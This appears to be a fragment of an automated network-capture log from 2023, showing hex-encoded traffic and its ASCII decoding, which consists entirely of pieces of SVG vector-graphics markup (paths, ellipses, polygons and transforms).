                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2789INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2805INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2821INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2837INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2853INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2869INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2885INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2901INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                          Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2917INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2933INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                          Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2949INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                          Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3510INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3526INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                          Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3542INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3558INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                          Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3574INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                          Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3590INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                          Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
